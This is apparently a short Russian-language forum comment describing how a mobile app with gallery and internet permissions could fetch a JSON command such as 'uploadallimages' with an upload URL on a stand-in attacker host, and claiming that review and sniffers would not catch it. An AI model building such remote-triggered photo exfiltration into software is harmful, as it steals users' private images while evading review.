Хм предположим гипотетически что у приложения есть разрешения на галерею и интернет доступ.
Пусть оно обращается к серверу и получает json.
Пусть json выглядит примерно так:
"cmd": "uploadallimages",
"url": "https://evilsite.com/upload.php"
Никакая проверка не выявит ничего подозрительного, тем более что строки можно заменить цифрами.
Никакой сниффер кстати не поможет, будет только факт трафика по какому то адресу.